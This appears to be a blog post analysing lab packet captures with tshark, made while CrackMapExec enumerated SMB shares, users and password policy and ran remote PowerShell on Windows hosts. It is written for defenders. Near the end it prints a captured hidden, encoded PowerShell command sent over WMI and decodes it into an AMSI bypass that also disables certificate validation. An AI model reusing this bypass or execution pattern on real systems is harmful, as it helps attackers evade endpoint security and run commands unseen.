root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -Y "( ip.addr == 10.0.0.100 ) && ( ip.addr == 10.0.0.105 ) && ( tcp.port ==35710 ) && ( tcp.port == 445 )" | more
35   4.701908   10.0.0.100 → 10.0.0.105   TCP 74 35710 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2860773415 TSecr=0 WS=128
   37   4.702292   10.0.0.105 → 10.0.0.100   TCP 66 445 → 35710 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
   38   4.702307   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
   41   4.703211   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   44   4.706059   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   45   4.706077   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
   48   4.709555   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   49   4.710187   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   52   4.719150   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   53   4.719743   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   56   4.728556   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   57   4.731502   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   59   4.734839   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   62   4.736363   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   63   4.753927   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   64   4.756372   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   68   4.760402   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   69   4.761060   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   72   4.772888   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   74   4.775421   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   76   4.778370   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   78   4.779050   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   81   4.786392   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   85   4.789841   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  103   4.829145   10.0.0.105 → 10.0.0.100   TCP 139 [TCP Retransmission] 445 → 35710 [PSH, ACK] Seq=2313 Ack=3016 Win=2100736 Len=85
  104   4.829160   10.0.0.100 → 10.0.0.105   TCP 66 35710 → 445 [ACK] Seq=3016 Ack=2398 Win=35712 Len=0 SLE=2313 SRE=2398
  118   4.870576   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
  119   4.870976   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
  120   4.870995   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=3178 Ack=2534 Win=36736 Len=0
...........
  463   5.966266   10.0.0.105 → 10.0.0.100   SMB2 182 Encrypted SMB3
  464   5.970495   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  465   5.970824   10.0.0.105 → 10.0.0.100   SMB2 178 Encrypted SMB3
  468   6.013389   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=14032 Ack=27752 Win=185856 Len=0
  484   6.040763   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [FIN, ACK] Seq=14032 Ack=27752 Win=185856 Len=0
  485   6.041096   10.0.0.105 → 10.0.0.100   TCP 60 445 → 35710 [ACK] Seq=27752 Ack=14033 Win=2102272 Len=0
  486   6.042828   10.0.0.105 → 10.0.0.100   TCP 60 445 → 35710 [RST, ACK] Seq=27752 Ack=14033 Win=0 Len=0

Uh oh!! Looks like this communication is encrypted with SMB3. However, if you pay close attention above, we see a number of "STATUS_LOGON_FAILURE" for "SECURITYNIK\Administrator". Let's leave this for now. Do note also most of the other conversations are much the same.

Let's now transition to the enumeration of the users and groups, to see what we can learn from the packets.

Looking at the traffic from the user enumeration, if we start with the conversations, we see 10 conversations being reported in the pcap file. if we look at the first one with port 36662, we see this ties back into our log analysis. Let's take a look at these packets to see what we can learn.


root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:36662           <-> 10.0.0.105:445                  81     20594      78     18654     159     39248     9.171767000         1.2807
10.0.0.100:52980           <-> 10.0.0.103:445                  58     15862      60     14173     118     30035     9.321117000         0.6187
10.0.0.100:36660           <-> 10.0.0.105:445                  13      2714      15      2933      28      5647     9.060796000         1.3251
10.0.0.100:52978           <-> 10.0.0.103:445                  13      3074      15      2887      28      5961     9.208452000         1.1786
10.0.0.100:36652           <-> 10.0.0.105:445                   9      1638      10      1166      19      2804     8.944584000         1.5418
10.0.0.100:41964           <-> 10.0.0.3:445                     7      1729      11      1451      18      3180     8.997733000         1.4911
10.0.0.100:52972           <-> 10.0.0.103:445                   7      1746      11      1459      18      3205     8.998512000         1.4915
10.0.0.100:36656           <-> 10.0.0.105:445                   8      1525       9      1409      17      2934     8.998254000         1.5223
10.0.0.100:52962           <-> 10.0.0.103:445                   6      1677       8      1030      14      2707     8.944150000         0.0536
10.0.0.100:41960           <-> 10.0.0.3:445                     6      1669       8      1030      14      2699     8.944373000         0.0425
================================================================================

Looking at the actual packets now


root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -Y "( tcp.port == 36662 ) && ( tcp.port == 445 )"
  109   9.171767   10.0.0.100 → 10.0.0.105   TCP 74 36662 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2872505954 TSecr=0 WS=128
  110   9.172057   10.0.0.105 → 10.0.0.100   TCP 66 445 → 36662 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  111   9.172070   10.0.0.100 → 10.0.0.105   TCP 54 36662 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
  113   9.180091   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
  115   9.193928   10.0.0.105 → 10.0.0.100   TCP 60 445 → 36662 [ACK] Seq=1 Ack=74 Win=2102272 Len=0
  130   9.223667   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  131   9.223681   10.0.0.100 → 10.0.0.105   TCP 54 36662 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
  135   9.230843   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
  143   9.256814   10.0.0.105 → 10.0.0.100   TCP 60 445 → 36662 [ACK] Seq=253 Ack=184 Win=2102272 Len=0
  193   9.550036   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  196   9.554980   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
  197   9.557240   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  200   9.572289   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
  201   9.574589   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  206   9.591850   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
  207   9.593175   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
  210   9.607005   10.0.0.100 → 10.0.0.105   SMB2 238 Encrypted SMB3
  211   9.607508   10.0.0.105 → 10.0.0.100   SMB2 262 Encrypted SMB3
  214   9.617532   10.0.0.100 → 10.0.0.105   SMB2 294 Encrypted SMB3
  215   9.617975   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
  218   9.628218   10.0.0.100 → 10.0.0.105   SMB2 223 Encrypted SMB3
  219   9.628717   10.0.0.105 → 10.0.0.100   SMB2 258 Encrypted SMB3
  222   9.639361   10.0.0.100 → 10.0.0.105   SMB2 258 Encrypted SMB3
....
  423  10.449068   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  424  10.449465   10.0.0.105 → 10.0.0.100   SMB2 178 Encrypted SMB3
  425  10.451778   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  426  10.452430   10.0.0.105 → 10.0.0.100   TCP 60 445 → 36662 [RST, ACK] Seq=16173 Ack=14423 Win=0 Len=0

Uh Oh. From above we see that this traffic is also encrypted. This makes it difficult for our security monitoring tools to effectively do their jobs.

As the previous session was encrypted. Let's now see what we can get from the packets associated with the password policy enumeration.

Without further ado, let's take a look at the packet capture to see if we what type of traffic might be in here.

Looking at the protocol hierarchy, see some SMB and SMB2 traffic.

root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:113 bytes:21694
  arp                                    frames:2 bytes:102
  ip                                     frames:111 bytes:21592
    tcp                                  frames:111 bytes:21592
      nbss                               frames:78 bytes:19550
        smb                              frames:4 bytes:508
        smb2                             frames:74 bytes:19042
===================================================================

Looking at above, I would conclude that there is no encrypted traffic. Let's see if that is true.

Peeking first into SMB traffic, we see:


root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb"
    6   3.214791   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   20   3.237020   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   34   3.279046   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   59   3.394125   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request

From above, we see the SMB packets seems to all be associated with the SMB negotiate protocol request. I would assume at this point the server responded back stating that it would like to use SMB2, this is why we do not see any additional traffic.

Let's now look into the SMB2 traffic.


root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb2"
    7   3.215534   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
    9   3.218110   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   10   3.218617   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   11   3.222438   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   12   3.224476   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   13   3.229892   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
   14   3.230867   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   15   3.234048   10.0.0.100 → 10.0.0.105   SMB2 126 Session Logoff Request
   16   3.234344   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
   21   3.238371   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   23   3.241025   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   24   3.241635   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   25   3.248880   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   26   3.249527   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   27   3.256058   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   28   3.258185   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   35   3.279840   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   37   3.293799   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   38   3.294739   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   39   3.298425   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   41   3.299181   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   42   3.305931   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   43   3.308715   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   44   3.313429   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
   45   3.313913   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
   .....
   54   3.377248   10.0.0.100 → 10.0.0.105   SMB2 223 Encrypted SMB3
   55   3.377657   10.0.0.105 → 10.0.0.100   SMB2 238 Encrypted SMB3
   60   3.396247   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   62   3.400194   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   63   3.400920   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   64   3.412338   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   65   3.413306   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   67   3.434020   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   68   3.436640   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   69   3.451598   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3 
   77   3.522068   10.0.0.100 → 10.0.0.105   SMB2 258 Encrypted SMB3
   78   3.522898   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
   ......
   99   3.704565   10.0.0.100 → 10.0.0.105   SMB2 223 Encrypted SMB3
  100   3.704911   10.0.0.105 → 10.0.0.100   SMB2 246 Encrypted SMB3

Holy smack! Looks like yet another set of encrypted traffic. Well nothing else to see here at this time. Let's move on to see what things look like when we execute remote commands.

Let's now see what the communication looks like when crackmapexec runs a powershell command.

As always, when we first look at our pcap file, we look at the protocol hierarchy to understand what is in the file. Let's do that.

root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:247 bytes:82427
  arp                                    frames:8 bytes:408
  ip                                     frames:239 bytes:82019
    udp                                  frames:4 bytes:860
      ssdp                               frames:4 bytes:860
    tcp                                  frames:235 bytes:81159
      nbss                               frames:121 bytes:29648
        smb                              frames:3 bytes:381
        smb2                             frames:118 bytes:29267
          tcp.segments                   frames:1 bytes:2742
      dcerpc                             frames:31 bytes:40114
        isystemactivator                 frames:2 bytes:1644
        remunk                           frames:2 bytes:300
        dcerpc.stub_data                 frames:5 bytes:21630
        dcerpc.fragments                 frames:1 bytes:790
===================================================================


Looking at the SMB communication, we see below once again, that this is more than likely the client trying to communicatevia SMB version 1.


root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb"
   16  43.408475   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   30  43.435753   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   42  43.463106   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request

Once again let's look at the SMB2 communication.


root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb2"
   17  43.409255   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   19  43.413105   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   20  43.413704   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   21  43.418281   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   22  43.418780   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   23  43.426458   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
   24  43.427636   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   25  43.432235   10.0.0.100 → 10.0.0.105   SMB2 126 Session Logoff Request
   26  43.432623   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
   31  43.437344   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   33  43.440996   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   34  43.441606   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   35  43.446277   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   36  43.446815   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   37  43.455948   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   38  43.458155   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   43  43.464624   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   45  43.468269   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   46  43.468962   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   49  43.473830   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   50  43.474372   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   51  43.481931   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   52  43.484388   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
....
  227  47.334141   10.0.0.105 → 10.0.0.100   SMB2 234 Encrypted SMB3
  228  47.338399   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  229  47.343532   10.0.0.105 → 10.0.0.100   SMB2 178 Encrypted SMB3

So far we seen that the majority of this tools SMB communication is encrypted. Let's see if there is anything we can learn from the "dcerpc" communication.


root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "dcerpc"
   70  43.594887   10.0.0.100 → 10.0.0.105   DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: ISystemActivator V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   71  43.595566   10.0.0.105 → 10.0.0.100   DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   73  43.603971   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   76  43.640433   10.0.0.100 → 10.0.0.105   ISystemActivator 566 RemoteCreateInstance request
   77  43.645133   10.0.0.105 → 10.0.0.100   ISystemActivator 1078 RemoteCreateInstance response
   81  43.682025   10.0.0.100 → 10.0.0.105   DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: f309ad18-d86a-11d0-a075-00c04fb68820 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   82  43.682530   10.0.0.105 → 10.0.0.100   DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   86  43.702770   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   88  43.718458   10.0.0.100 → 10.0.0.105   DCERPC 210 Request: call_id: 2, Fragment: Single, opnum: 6, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
   89  43.719805   10.0.0.105 → 10.0.0.100   DCERPC 294 Response: call_id: 2, Fragment: Single, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
   90  43.727167   10.0.0.100 → 10.0.0.105   DCERPC 166 Alter_context: call_id: 3, Fragment: Single, 1 context items: IRemUnknown V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   91  43.727812   10.0.0.105 → 10.0.0.100   DCERPC 402 Alter_context_resp: call_id: 3, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   92  43.747847   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 3, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   94  43.765583   10.0.0.100 → 10.0.0.105   IRemUnknown 182 RemRelease request Cnt=1 Refs=1-0
   95  43.766108   10.0.0.105 → 10.0.0.100   IRemUnknown 118 RemRelease response -> S_OK
   96  43.772729   10.0.0.100 → 10.0.0.105   DCERPC 166 Alter_context: call_id: 5, Fragment: Single, 1 context items: 9556dc99-828c-11cf-a37e-00aa003240c7 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   97  43.773407   10.0.0.105 → 10.0.0.100   DCERPC 402 Alter_context_resp: call_id: 5, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   98  43.788367   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 5, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
  100  43.827914   10.0.0.100 → 10.0.0.105   DCERPC 226 Request: call_id: 6, Fragment: Single, opnum: 6, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  101  43.835340   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: 1st, Ctx: 2
  103  43.835429   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  105  43.835655   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  107  43.835711   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  109  43.835917   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  111  43.835981   10.0.0.105 → 10.0.0.100   DCERPC 790 Response: call_id: 6, Fragment: Last, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  114  44.446346   10.0.0.100 → 10.0.0.105   DCERPC 2050 Request: call_id: 7, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  116  44.578642   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 7, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  144  44.726719   10.0.0.100 → 10.0.0.105   DCERPC 2046 Request: call_id: 8, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  147  44.753078   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 8, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  177  44.960333   10.0.0.100 → 10.0.0.105   DCERPC 2738 Request: call_id: 9, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  181  44.992849   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 9, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0

The above looks interesting  in that there are some cleartext. Let's follow the stream to see if we see anything of interest. Please note I've edited below for brevity but just tried to keep what I believe was important.

root@securitynik:~/cme# tshark -q -n -r cme-powershell.pcap -n -z follow,tcp,ascii,10.0.0.100:37794,10.0.0.105:49666
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.100 and tcp.srcport eq 37794) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 49666)) or ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 37794))
Node 0: 10.0.0.100:37794
Node 1: 10.0.0.105:49666
112
....5..NTLMSSP.........p...".".........@.......V.......p...........5...S.E.C.U.R.I.T.Y.N.I.K.a.d.m.i.n.i.s.t.r.a.t.o.r....T...J7..7...bOk63ZTRY........i.4.............`J9K....Ok63ZTRY........S.E.C.N.I.K.-.2.K.1.9.....S.E.C.U.R.I.T.Y.N.I.K...:.S.E.C.N.I.K.-.2.K.1.9...s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l.....`J9K...... .c.i.f.s./.S.E.C.N.I.K.-.2.K.1.9.........
.).yPDg...Q' S.
156
................\................@ic#..................l..9H...*..?#....c..............././.../.r.o.o.t./.c.i.m.v.2.................
.....................................................................................................q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1..C:\....C...........
....5......s.H.........
..........................................................................................................................................................................................................................................................p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd  1> \\127.0.0.1\C$\Windows\Temp\AZGdHz 2>&1..C:\.>A..........
....5.........n..[H....
..D.................object:Win32_ProcessStartup.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$........0......................__PARAMETERS..cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA== 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1..C:\.FF..........
....5......hj..h$......

===================================================================

As we can see from above, we seem to have some powershell code being executed. However, we do not see any results. This is still good as at least we have something of interes at this point. Let's copy this code and decode it at the Linux command lines


root@securitynik:~/cme# echo "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA==" | base64 --decode
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
try{ 
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
get-process

From above, we an conlude that the "get-process" cmdlet was executed via powershell.

No more analysis for us to do on this pcap file via tshark.

